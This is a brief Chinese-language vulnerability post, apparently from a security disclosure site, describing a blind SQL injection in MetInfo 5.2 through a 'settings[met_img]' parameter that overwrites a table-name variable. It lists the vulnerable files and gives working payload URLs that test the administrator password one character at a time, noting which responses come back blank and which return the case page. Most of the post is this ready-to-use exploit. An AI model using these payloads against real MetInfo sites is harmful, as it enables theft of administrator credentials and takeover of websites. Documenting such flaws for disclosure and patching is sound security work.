MetInfo最新版SQL盲注漏洞

MetInfo最新版SQL盲注漏洞,可盲注管理员信息。
D:\wamp\www\MetInfo5.2\img\img.php

第7行$dbname可以覆盖此变量

http://localhost/case/?settings[met_img]=met_admin_table%20or%201=1 —
mt
来到文件

D:\wamp\www\MetInfo5.2\include\global\listmod.php

接着进入数据库查询即可导致注入。
漏洞证明:
打开页面

http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(56)– 1

—–返回空白

http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(55)– 1

—–返回案例

通过返回的信息可以盲注出管理员信息。
mcc

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录